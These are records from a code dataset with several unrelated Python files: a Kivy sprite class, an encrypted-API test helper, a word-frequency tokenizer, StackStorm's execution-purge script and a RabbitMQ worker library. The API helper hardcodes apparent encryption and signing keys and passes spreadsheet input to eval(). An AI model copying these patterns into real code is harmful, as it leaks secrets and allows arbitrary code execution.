self.setPos(*add(touch.pos, self.touchOffset))\n self.updateAttachObjPos()\n \n def on_touch_up(self, touch):\n if touch.grab_current is self:\n self.isTouched = False \n self.setPos(*add(touch.pos, self.touchOffset))\n if touch.time_update > 0 and self.throwable:\n self.setVelocity(*add(self.vel, div((touch.dx, touch.dy), Util.fFrameTime)))\n self.setUpdateTranslate(True)\n touch.ungrab(self)\n \n def setUpdateTranslate(self, bUpdate):\n self.updateTranslate = bUpdate\n \n @property\n def center(self):\n return (self.boxPos.x + self.realSize[0] * 0.5, self.boxPos.y + self.realSize[1] * 0.5)\n \n @center.setter\n def center(self, centerPos):\n self.boxPos.x = centerPos[0] - self.realSize[0] * 0.5\n self.boxPos.y = centerPos[1] - self.realSize[1] * 0.5\n \n def getPos(self):\n return (self.boxPos.x, self.boxPos.y)\n \n def setPos(self, x, y):\n self.oldPos = (self.boxPos.x, self.boxPos.y)\n self.boxPos.x = x\n self.boxPos.y = y\n \n def getDir(self):\n return normalize(self.vel)\n \n def getVelocity(self):\n return (self.vel[0], self.vel[1])\n \n def setVelocity(self, vx, vy):\n self.vel[0] = vx\n self.vel[1] = vy\n \n def getRotate(self):\n return self.boxRot.angle\n \n def setRotate(self, angle):\n self.boxRot.angle = angle\n \n def getRotateVel(self):\n return self.rotateVel\n \n def setRotateVel(self, vel):\n self.rotateVel = vel\n \n def getScale(self):\n return self.scaling\n \n def setScale(self, scale):\n self.scaling = scale\n self.realSize = mul(self.size, self.scaling)\n self.boxScale.xyz = (scale, scale, scale)\n \n def setAttached(self, isAttached):\n self.isAttached = isAttached\n \n def attach(self, child, offset = None):\n if not isinstance(child, Sprite):\n raise TypeError(\"It is not instance of Sprite\")\n if child not in self.attachOffsetList:\n child.setAttached(True)\n if offset == None:\n offset = sub(child.getPos(), self.getPos())\n self.attachOffsetList[child] = offset\n \n def detach(self, child):\n if child in self.attachOffsetList:\n child.setAttached(False)\n self.attachOffsetList.pop(child)\n \n def detach_all(self):\n while self.attachOffsetList:\n self.detach(self.attachOffsetList.keys()[0])\n \n def updateAttachObjPos(self):\n for child in self.attachOffsetList:\n child.setPos(*add(self.getPos(), self.attachOffsetList[child]))\n\n def update(self, fFrameTime):\n if self.updateTranslate and not self.isAttached:\n # set gravity\n if self.gravity != 0:\n self.vel[1] -= self.gravity * fFrameTime\n \n # adjust velocity, move\n self.oldPos = (self.boxPos.x, self.boxPos.y)\n if self.vel[0] != 0:\n self.boxPos.x += self.vel[0] * fFrameTime\n if self.vel[1] != 0:\n self.boxPos.y += self.vel[1] * fFrameTime\n \n if self.collision:\n if self.boxPos.x < self.collisionSpace[0]:\n self.boxPos.x = self.collisionSpace[0] * 2.0 - self.boxPos.x\n self.vel[0] = -self.vel[0] * self.friction\n elif self.boxPos.x > self.collisionSpace[2] - self.realSize[0]:\n self.boxPos.x = (self.collisionSpace[2] - self.realSize[0]) * 2.0 - self.boxPos.x\n self.vel[0] = -self.vel[0] * self.friction\n if self.boxPos.y < self.collisionSpace[1]:\n self.boxPos.y = self.collisionSpace[1] * 2.0 - self.boxPos.y\n self.vel[1] = -self.vel[1] * self.elastin\n if self.elastin == 0.0 or self.vel[1] > 0.0 and self.vel[1] <= abs(self.gravity * fFrameTime):\n self.vel[1] = 0.0\n self.boxPos.y = self.collisionSpace[1]\n elif self.boxPos.y > self.collisionSpace[3] - self.realSize[1]:\n self.boxPos.y = (self.collisionSpace[3] - self.realSize[1]) * 2.0 - self.boxPos.y\n self.vel[1] = -self.vel[1] * self.elastin\n \n if self.oldPos[1] == self.boxPos.y and self.vel[1] == 0.0:\n self.isGround = True\n else:\n self.isGround = False\n \n # update attach obj pos\n self.updateAttachObjPos()\n \n if self.updateRotation:\n if self.rotateVel != 0.0:\n self.boxRot.angle += self.rotateVel * fFrameTime\n \n#---------------------#\n# set global instance\n#---------------------#\nsetGlobalInstance()", "sub_path": "KivyProject/00_GameFrame/Sprite/Sprite.py", "file_name": "Sprite.py", "file_ext": "py", "file_size_in_byte": 8428, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "Utility.MyRoot.instance", "line_number": 21, "usage_type": "call"}, {"api_name": "Utility.MyRoot", "line_number": 21, "usage_type": "attribute"}, {"api_name": "Utility.W", "line_number": 59, "usage_type": "attribute"}, {"api_name": "Utility.H", "line_number": 59, "usage_type": "attribute"}, {"api_name": "kivy.graphics.PushMatrix", "line_number": 99, "usage_type": "call"}, {"api_name": "kivy.graphics.Translate", "line_number": 100, "usage_type": "call"}, {"api_name": "kivy.graphics.Rotate", "line_number": 101, "usage_type": "call"}, {"api_name": "kivy.graphics.Scale", "line_number": 102, "usage_type": "call"}, {"api_name": "kivy.graphics.PopMatrix", "line_number": 104, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 114, "usage_type": "call"}, {"api_name": "Utility.fFrameTime", "line_number": 139, "usage_type": "attribute"}]} +{"seq_id": "652882720", "text": "#-*- coding:utf-8 -*-\n# author:29557\n# datetime:2019/2/12 15:04\n# software: PyCharm\nimport json,requests,time,random,base64,hashlib\nfrom Public.tools import Log\nfrom pyDes import *\nfrom urllib import parse\n\nclass requerst_api:\n def __init__(self):\n self.header1 = {'Accept': '* / *',\n 'Accept - Encoding': 'gzip, deflate, br',\n 'Accept - Language': 'zh, en - US;q = 0.9, en;q = 0.8, zh - CN;q = 0.7',\n 'Connection': 'keep - alive',\n 'Content - Type': 'text/html;charset=utf-8'\n }\n self.header2 = {'content-type': 'application/x-www-form-urlencoded', 'Access-Control-Allow-Origin': '*'}\n\n def run_api(self, url, service, method='post', data='', headers=''): # 接口请求\n if type(service) is str: service = {\"service\": service}\n if 'webApi' in url:\n if any(data) and any(headers) is False:headers = self.header1\n if 'test' not in url:data = encrpyt().interfaceDes(data)\n else:\n if any(data) and any(headers) is False:headers = self.header2\n if 'test' not in url:data = encrpyt().interfaceDes(data, web_api=False)\n try:\n r = requests.request(method, url, data=data, headers=headers, params=service)\n response_code = r.status_code\n response_text1 = json.loads(r.text) # 对返回的指定字段断言,字段名取自Excel的期望2\n Log().info(' 【成功发起POST请求】 请求结果code为:%s, 请求结果字段为:%s' % (response_code, json.loads(r.text)))\n return response_code, response_text1\n except Exception as e:\n Log().error('【post请求出错】 出错原因:%s' % e)\n return {'code': 1, 'result': 'post请求出错,出错原因:%s' % e}\n\nclass encrpyt:\n def __init__(self):\n self.DELIVER_KEY = \"Jihewobox15\"\n self.DES_VI = \"98765432\"\n self.DES_KEY = \"jihexxkj\"\n self.isEncrypted = 1\n self.lang = 'zh'\n\n def interfaceDes(self, pm, web_api=True):\n timeStamp = int(time.time())\n randomNum = random.randint(100000, 999999)\n self.k = des(self.DES_KEY, CBC, self.DES_VI, pad=None, padmode=PAD_PKCS5) # DES加密方法\n EncryptStr = self.k.encrypt(pm.encode('gbk'))\n params = base64.b64encode(EncryptStr).decode() # 字节转换为字符串\n if web_api is True:params = parse.quote(params)\n sign = str(params) + str(self.isEncrypted) + str(timeStamp) + str(randomNum) + hashlib.md5(\n self.DELIVER_KEY.encode(encoding='UTF-8')).hexdigest()\n sign = hashlib.md5(sign.encode(encoding='UTF-8')).hexdigest()\n params = {\"timeStamp\": timeStamp, \"randomNum\": randomNum, \"isEncrypted\": self.isEncrypted, \"sign\": sign,\n \"params\": params, \"lang\": self.lang}\n return params\n\n def passwordDes(self, ps): # 密码加密\n EncryptStr = self.k.encrypt(ps)\n params = base64.b64encode(EncryptStr).decode() # 字节转换为字符串\n return params\n\nclass data_process:\n def excel_process(self, data):\n try:\n b = type(data)\n if b is str:\n if not data.strip():\n Log().info('测试预期值为空,请填写!')\n return None\n else:\n data = eval(data)\n b = type(data)\n if b is float:data = int(data)\n except:data = data\n return data", "sub_path": "Public/run_test_data.py", "file_name": "run_test_data.py", "file_ext": "py", "file_size_in_byte": 3570, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.request", "line_number": 29, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "Public.tools.Log", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 32, "usage_type": "call"}, {"api_name": "Public.tools.Log", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 52, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 52, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 53, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 55, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 62, "usage_type": "call"}, {"api_name": "Public.tools.Log", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "70179584", "text": "# Part A\n\nimport re # Regex\nimport sys # Gets commands line args\nimport os # Testing file paths\nimport operator # Used for sorting dictionaries\n\nfrom nltk.stem import PorterStemmer\n\ncommonList = [\"a\", \"about\", \"above\", \"after\", \"again\", \"against\",\n \"all\", \"am\", \"an\", \"and\", \"any\", \"are\",\n \"arent\", \"as\", \"at\", \"be\", \"because\", \"been\",\n \"before\", \"being\", \"below\", \"between\", \"both\", \"but\",\n \"by\", \"cant\", \"cannot\", \"could\", \"couldnt\", \"did\",\n \"didnt\", \"do\", \"does\", \"doesnt\", \"doing\", \"dont\",\n \"down\", \"during\", \"each\", \"few\", \"for\", \"from\",\n \"further\", \"had\", \"hadnt\", \"has\", \"hasnt\", \"have\",\n \"havent\", \"having\", \"he\", \"hed\", \"hell\", \"hes\",\n \"her\", \"here\", \"heres\", \"hers\", \"herself\", \"him\",\n \"himself\", \"his\", \"how\", \"hows\", \"i\", \"id\",\n \"ill\", \"im\", \"ive\", \"if\", \"in\", \"into\",\n \"is\", \"isnt\", \"it\", \"its\", \"its\", \"itself\",\n \"lets\", \"me\", \"more\", \"most\", \"mustnt\", \"my\",\n \"myself\", \"no\", \"nor\", \"not\", \"of\", \"off\",\n \"on\", \"once\", \"only\", \"or\", \"other\", \"ought\",\n \"our\", \"ours\tourselves\", \"out\", \"over\", \"own\", \"same\",\n \"shant\", \"she\", \"shed\", \"shell\", \"shes\", \"should\",\n \"shouldnt\", \"so\", \"some\", \"such\", \"than\", \"that\",\n \"thats\", \"the\", \"their\", \"theirs\", \"them\", \"themselves\",\n \"then\", \"there\", \"theres\", \"these\", \"they\", \"theyd\",\n \"theyll\", \"theyre\", \"theyve\", \"this\", \"those\", \"through\",\n \"to\", \"too\", \"under\", \"until\", \"up\", \"very\",\n \"was\", \"wasnt\", \"we\", \"wed\", \"well\", \"were\",\n \"weve\", \"werent\", \"what\", \"whats\", \"when\",\n \"whens\", \"where\", \"wheres\", \"which\", \"while\", \"who\",\n \"whos\", \"whom\", \"why\", \"whys\", \"with\", \"wont\",\n \"would\", \"wouldnt\", \"you\", \"youd\", \"youll\", \"youre\",\n \"youve\", \"your\", \"yours\", \"yourself\", \"yourselves\"]\n\n\"\"\" tokenize N TIME COMPLEXITY: O(n)\nThis method reads through each word once and puts them in a list without\nrepeating.\n\"\"\"\n\n\ndef tokenize(filepath):\n tokens = []\n ps = PorterStemmer()\n if os.path.exists(filepath): # https://stackoverflow.com/questions/82831/how-do-i-check-whether-a-file-exists-without-exceptions\n with open(filepath, 'r', encoding=\"utf-8\") as f:\n try: # Catches files that can't be read\n for line in f:\n for word in line.split():\n try: # Catches words that can't be tokenized\n res = re.sub(r'[^A-Za-z0-9]', '', word) # Use regex to remove non alpha numerics\n res = res.lower()\n res = ps.stem(res)\n if res != '' and res not in commonList: # Does not allow blank tokens\n tokens.append(res)\n except: # Skips bad words\n pass\n f.close()\n except:\n print('Error: File could not be read. Please use a readable text file as input.')\n sys.exit()\n\n else:\n print('Error: File not found, please check your file parameters.')\n sys.exit()\n return tokens\n\n\n\"\"\"computeWordFrequencies N TIME COMPLEXITY: O(n)\nThis method reads through the list and logs the results in a dictionary.\nIt takes n time to read through the list and takes constant time to\nrecord the results since accessing a dictionary/adding to \nit is like a hash lookup.\n\"\"\"\n\n\ndef computeWordFrequencies(tokenList):\n myBook = {}\n for word in tokenList:\n if word in myBook:\n myBook[word] = myBook[word] + 1\n else:\n myBook[word] = 1\n return myBook\n\n\n\"\"\" print N TIME COMPLEXITY: O(n log n)\nThis method takes the contents of a dictionary and sorts them into a list of tuples\nby python's default sorting method. Sorting takes n log n time.\n\"\"\"\n\n\ndef aPrint(freqMap):\n dSorted = sorted(freqMap.items(), reverse=True,\n key=operator.itemgetter(1)) # https://docs.python.org/2/howto/sorting.html\n for entry in dSorted:\n print('{} => {}'.format(entry[0], entry[1]))\n\n\n# Extra functions for assignment 2\n# Takes a list strings and turns them into proper tokens\ndef simple_tokenize(tokens):\n counter = 0\n ps = PorterStemmer()\n while counter < len(tokens):\n res = re.sub(r'[^A-Za-z0-9]', '', tokens[counter]) # Use regex to remove non alpha numerics\n res = res.lower()\n res = ps.stem(res)\n if res == '' or res in commonList: # Does not allow blank tokens or common words\n tokens.pop(counter)\n else:\n tokens[counter] = res\n counter += 1\n return tokens\n\n\n# Takes a dictionary and list of words and adds to the dictionary\ndef combineFreq(tokenList, myBook):\n for word in tokenList:\n if word in myBook:\n myBook[word] = myBook[word] + 1\n else:\n myBook[word] = 1\n return myBook\n\n\n# Prints the top 50 common words from a dictionary\ndef print50(freqMap):\n \"\"\"\n given map, prints out the top 50 most frequent words\n :param freqMap: map that maps words to their frequencies\n :return: nothing\n \"\"\"\n dSorted = sorted(freqMap.items(), reverse=True,\n key=operator.itemgetter(1)) # https://docs.python.org/2/howto/sorting.html\n counter = 1\n for entry in dSorted:\n print(\"{}: {} => {}\".format(counter, entry[0], entry[1])) # Code to test number of entries\n \n # print(entry[0])\n if counter == 50:\n break\n counter += 1\n\n\n# Demo for combining multiple lists of words into 1 dictionary\nif __name__ == \"__main__\":\n bigBook = {} # Initially empty dictionary, it will store the count of all words processed\n\n list1 = ['@#%^$', 'Word', 'Words!', '沼', 'te沼st', '1991اف_جي2']\n list2 = ['wOrD', 'JeReMy', '121*@#', 'pu#$ll', '#3PuSh', 'test', 'testing']\n\n # The first list goes through simple_tokenize function to get correct tokens\n list1 = simple_tokenize(list1)\n # The list is then fed to the dictionary bigBook using the combineFreq function\n bigBook = combineFreq(list1, bigBook)\n\n # Same thing is done with second list\n list2 = simple_tokenize(list2)\n bigBook = combineFreq(list2, bigBook)\n\n # After all the lists are combined, we can print the top 50 using print50\n print50(bigBook)\n", "sub_path": "PartA.py", "file_name": "PartA.py", "file_ext": "py", "file_size_in_byte": 6523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "nltk.stem.PorterStemmer", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 99, "usage_type": "call"}, {"api_name": "nltk.stem.PorterStemmer", "line_number": 108, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 110, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "541914460", "text": "# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"\nA utility script that purges st2 executions older than certain\ntimestamp.\n\n*** RISK RISK RISK. You will lose data. Run at your own risk. ***\n\"\"\"\n\nimport copy\nfrom datetime import datetime\nimport pytz\n\nfrom mongoengine.errors import InvalidQueryError\nfrom oslo_config import cfg\n\nfrom st2common import config\nfrom st2common import log as logging\nfrom st2common.constants import action as action_constants\nfrom st2common.script_setup import setup as common_setup\nfrom st2common.script_setup import teardown as common_teardown\nfrom st2common.persistence.liveaction import LiveAction\nfrom st2common.persistence.execution import ActionExecution\nfrom st2common.util import isotime\n\nLOG = logging.getLogger(__name__)\n\nDONE_STATES = [action_constants.LIVEACTION_STATUS_SUCCEEDED,\n action_constants.LIVEACTION_STATUS_FAILED,\n action_constants.LIVEACTION_STATUS_TIMED_OUT,\n action_constants.LIVEACTION_STATUS_CANCELED]\n\n\ndef _do_register_cli_opts(opts, ignore_errors=False):\n for opt in opts:\n try:\n cfg.CONF.register_cli_opt(opt)\n except:\n if not ignore_errors:\n raise\n\n\ndef _register_cli_opts():\n cli_opts = [\n cfg.StrOpt('timestamp', default=None,\n help='Will delete execution and liveaction models older than ' +\n 'this UTC timestamp. ' +\n 'Example value: 2015-03-13T19:01:27.255542Z.'),\n cfg.StrOpt('action-ref', default='',\n help='action-ref to delete executions for.'),\n cfg.BoolOpt('purge-incomplete', default=False,\n help='Purge all models irrespective of their ``status``.' +\n 'By default, only executions in completed states such as \"succeeeded\" ' +\n ', \"failed\", \"canceled\" and \"timed_out\" are deleted.'),\n ]\n _do_register_cli_opts(cli_opts)\n\n\ndef purge_executions(timestamp=None, action_ref=None, purge_incomplete=False):\n if not timestamp:\n LOG.error('Specify a valid timestamp to purge.')\n return 1\n\n LOG.info('Purging executions older than timestamp: %s' %\n timestamp.strftime('%Y-%m-%dT%H:%M:%S.%fZ'))\n\n filters = {}\n\n if purge_incomplete:\n filters['start_timestamp__lt'] = isotime.parse(timestamp)\n else:\n filters['end_timestamp__lt'] = isotime.parse(timestamp)\n filters['start_timestamp__lt'] = isotime.parse(timestamp)\n filters['status'] = {\"$in\": DONE_STATES}\n\n exec_filters = copy.copy(filters)\n if action_ref:\n exec_filters['action__ref'] = action_ref\n\n liveaction_filters = copy.copy(filters)\n if action_ref:\n liveaction_filters['action'] = action_ref\n\n try:\n ActionExecution.delete_by_query(**exec_filters)\n except InvalidQueryError:\n LOG.exception('Bad query (%s) used to delete execution instances. ' +\n 'Please contact support.', exec_filters)\n return 2\n except:\n LOG.exception('Deletion of execution models failed for query with filters: %s.',\n exec_filters)\n\n try:\n LiveAction.delete_by_query(**liveaction_filters)\n except InvalidQueryError:\n LOG.exception('Bad query (%s) used to delete liveaction instances. ' +\n 'Please contact support.', liveaction_filters)\n return 3\n except:\n LOG.exception('Deletion of liveaction models failed for query with filters: %s.',\n liveaction_filters)\n\n zombie_execution_instances = len(ActionExecution.query(**exec_filters))\n zombie_liveaction_instances = len(LiveAction.query(**liveaction_filters))\n\n if (zombie_execution_instances > 0) or (zombie_liveaction_instances > 0):\n LOG.error('Zombie execution instances left: %d.', zombie_execution_instances)\n LOG.error('Zombie liveaction instances left: %s.', zombie_liveaction_instances)\n else:\n # Print stats\n LOG.info('#### All execution models less than timestamp %s were deleted.', timestamp)\n\n\ndef main():\n _register_cli_opts()\n common_setup(config=config, setup_db=True, register_mq_exchanges=False)\n\n # Get config values\n timestamp = cfg.CONF.timestamp\n action_ref = cfg.CONF.action_ref\n purge_incomplete = cfg.CONF.purge_incomplete\n\n if not timestamp:\n LOG.error('Please supply a timestamp for purging models. Aborting.')\n return 1\n else:\n timestamp = datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ')\n timestamp = timestamp.replace(tzinfo=pytz.UTC)\n\n # Purge models.\n try:\n return purge_executions(timestamp=timestamp, action_ref=action_ref,\n purge_incomplete=purge_incomplete)\n finally:\n common_teardown()\n", "sub_path": "st2common/st2common/cmd/purge_executions.py", "file_name": "purge_executions.py", "file_ext": "py", "file_size_in_byte": 5561, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "st2common.log.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "st2common.log", "line_number": 40, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_SUCCEEDED", "line_number": 42, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 42, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_FAILED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 43, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_TIMED_OUT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 44, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_CANCELED", "line_number": 45, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 45, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF.register_cli_opt", "line_number": 51, "usage_type": "call"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 51, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 51, "usage_type": "name"}, {"api_name": "oslo_config.cfg.StrOpt", "line_number": 59, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 59, "usage_type": "name"}, {"api_name": "oslo_config.cfg.StrOpt", "line_number": 63, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 63, "usage_type": "name"}, {"api_name": "oslo_config.cfg.BoolOpt", "line_number": 65, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 65, "usage_type": "name"}, {"api_name": "st2common.util.isotime.parse", "line_number": 84, "usage_type": "call"}, {"api_name": "st2common.util.isotime", "line_number": 84, "usage_type": "name"}, {"api_name": "st2common.util.isotime.parse", "line_number": 86, "usage_type": "call"}, {"api_name": "st2common.util.isotime", "line_number": 86, "usage_type": "name"}, {"api_name": "st2common.util.isotime.parse", "line_number": 87, "usage_type": "call"}, {"api_name": "st2common.util.isotime", "line_number": 87, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 90, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 94, "usage_type": "call"}, {"api_name": "st2common.persistence.execution.ActionExecution.delete_by_query", "line_number": 99, "usage_type": "call"}, {"api_name": "st2common.persistence.execution.ActionExecution", "line_number": 99, "usage_type": "name"}, {"api_name": "mongoengine.errors.InvalidQueryError", "line_number": 100, "usage_type": "name"}, {"api_name": "st2common.persistence.liveaction.LiveAction.delete_by_query", "line_number": 109, "usage_type": "call"}, {"api_name": "st2common.persistence.liveaction.LiveAction", "line_number": 109, "usage_type": "name"}, {"api_name": "mongoengine.errors.InvalidQueryError", "line_number": 110, "usage_type": "name"}, {"api_name": "st2common.persistence.execution.ActionExecution.query", "line_number": 118, "usage_type": "call"}, {"api_name": "st2common.persistence.execution.ActionExecution", "line_number": 118, "usage_type": "name"}, {"api_name": "st2common.persistence.liveaction.LiveAction.query", "line_number": 119, "usage_type": "call"}, {"api_name": "st2common.persistence.liveaction.LiveAction", "line_number": 119, "usage_type": "name"}, {"api_name": "st2common.script_setup.setup", "line_number": 131, "usage_type": "call"}, {"api_name": "st2common.config", "line_number": 131, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 134, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 134, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 135, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 135, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 136, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 136, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "name"}, {"api_name": "pytz.UTC", "line_number": 143, "usage_type": "attribute"}, {"api_name": "st2common.script_setup.teardown", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "286995643", "text": "import signal\nimport sys\nimport time\nimport pika\nimport logging\n\nlog = logging.getLogger('pikaprocess')\nFORMAT = \"[%(levelname)s - %(asctime)s - %(filename)s:%(lineno)s] %(message)s\"\nlogging.basicConfig(format=FORMAT)\n\nclass PikaChannel(object):\n def __init__(self, host, port, user, password, vhost):\n self._connection = None\n self._channel = None\n self._queues = []\n self._credentials = pika.PlainCredentials(user, password)\n self._parameters = pika.ConnectionParameters(host, port, vhost, self._credentials)\n \n def add_queue(self, **opts):\n log.info(\"Registering queue with options: {}\".format(opts))\n self._queues.append(opts)\n \n def __enter__(self):\n log.debug(\"Establishing RabbitMQ connection\")\n self._connection = pika.BlockingConnection(self._parameters)\n self._channel = self._connection.channel()\n for queue in self._queues:\n log.debug(\"Declaring RabbitMQ queue: {}\".format(queue))\n self._channel.queue_declare(**queue)\n return self._channel\n\n def __exit__(self, type, value, traceback):\n log.debug(\"Closing RabbitMQ connection\")\n self._connection.close()\n \n\nclass PikaProcess(object):\n def __init__(self, host, port, user, pwd, vhost,\n input_q_params, success_q_params,\n fail_q_params, sleep_time=30):\n self._current = None\n self._current_priority = 0\n self._sleep_time = sleep_time\n self._channel_manager = PikaChannel(host, port, user, pwd, vhost)\n self._input_q_params = input_q_params\n self._success_q_params = success_q_params\n self._fail_q_params = fail_q_params\n self._channel_manager.add_queue(**self._input_q_params)\n self._channel_manager.add_queue(**self._success_q_params)\n self._channel_manager.add_queue(**self._fail_q_params)\n signal.signal(signal.SIGTERM, self._signal_handler)\n signal.signal(signal.SIGINT, self._signal_handler)\n \n def _signal_handler(self, signum, frame):\n log.info(\"Signal handler called with signal {}\".format(signum))\n if self._current is not None:\n log.info(\"Returning current message, '{}', to the input queue with priority {}\".format(\n self._current, self._current_priority+1))\n self._return_to_input(self._current)\n sys.exit(0)\n \n def _get_input_message(self):\n with self._channel_manager as channel:\n method_frame, header_frame, body = channel.basic_get(queue=self._input_q_params['queue'])\n if method_frame is not None:\n if method_frame.NAME != 'Basic.GetEmpty':\n channel.basic_ack(delivery_tag=method_frame.delivery_tag)\n return method_frame, header_frame, body\n return None, None, None\n\n def _send_success_message(self, message):\n with self._channel_manager as channel:\n channel.basic_publish(exchange='', routing_key=self._success_q_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=0))\n\n def _send_fail_message(self, message):\n with self._channel_manager as channel:\n channel.basic_publish(exchange='', routing_key=self._fail_q_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=0))\n\n def _return_to_input(self, message):\n with self._channel_manager as channel:\n channel.basic_publish(exchange='', routing_key=self._input_q_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=self._current_priority+1))\n \n def process(self, message_handler):\n while True:\n mf, hf, message = self._get_input_message()\n if message is None:\n log.info(\"No message received, going to sleep for {} seconds\".format(self._sleep_time))\n time.sleep(self._sleep_time)\n continue\n else:\n self._current = message\n self._current_priority = hf.priority\n log.info(\"Received message: '{}' with priority level {}\".format(message,hf.priority))\n try:\n log.info(\"Calling handler\")\n message_handler(message)\n except Exception as error:\n log.exception(\"Message handler failure\")\n self._send_fail_message(message)\n else:\n log.info(\"Message successfully processed\")\n self._send_success_message(message)\n finally:\n self._current = None\n self._current_priority = 0\n\ndef add_pika_process_opts(parser):\n parser.add_option('-H', '--host', dest='host', type=str,\n help='RabbitMQ host', default=\"rabbitmq-service\")\n parser.add_option('-p', '--port', dest='port', type=int,\n help='RabbitMQ port', default=5672)\n parser.add_option('-u', '--user', dest='user', type=str,\n help='RabbitMQ username', default=\"guest\")\n parser.add_option('-k', '--password', dest='password', type=str,\n help='RabbitMQ password', default=\"guest\")\n parser.add_option('', '--vhost', dest='vhost', type=str,\n help='RabbitMQ vhost', default=\"/\")\n parser.add_option('', '--input', dest='input_queue', type=str,\n help='Name of input queue', default=\"test-input\")\n parser.add_option('', '--success', dest='success_queue', type=str,\n help='Name of success queue', default=\"test-success\")\n parser.add_option('', '--fail', dest='fail_queue', type=str,\n help='Name of fail queue', default=\"test-fail\")\n parser.add_option('', '--sleep_time', dest='sleep_time', type=float,\n help='Time to sleep when input queue is empty',\n default=30.0)\n parser.add_option('', '--log_level',dest='log_level',type=str,\n help='Logging level for pikaprocess logger', default=\"INFO\")\n\n\nclass PikaProducer(object):\n def __init__(self, host, port, user, pwd, vhost, queue_params):\n self._channel_manager = PikaChannel(host, port, user, pwd, vhost)\n self._queue_params = queue_params\n self._channel_manager.add_queue(**self._queue_params)\n\n def publish(self, messages, priority=0):\n with self._channel_manager as channel:\n if hasattr(messages,\"__iter__\") and not isinstance(messages,(str,bytes)):\n for message in messages:\n log.info(\"Publishing message '{}' to queue '{}'\".format(message,self._queue_params[\"queue\"]))\n channel.basic_publish(exchange='', routing_key=self._queue_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=priority))\n else:\n log.info(\"Publishing message '{}' to queue '{}'\".format(messages,self._queue_params[\"queue\"]))\n channel.basic_publish(exchange='', routing_key=self._queue_params[\"queue\"], body=messages,\n properties=pika.BasicProperties(delivery_mode = 2, priority=priority))\n\ndef add_pika_producer_opts(parser):\n parser.add_option('-H', '--host', dest='host', type=str,\n help='RabbitMQ host', default=\"rabbitmq-service\")\n parser.add_option('-p', '--port', dest='port', type=int,\n help='RabbitMQ port', default=5672)\n parser.add_option('-u', '--user', dest='user', type=str,\n help='RabbitMQ username', default=\"guest\")\n parser.add_option('-k', '--password', dest='password', 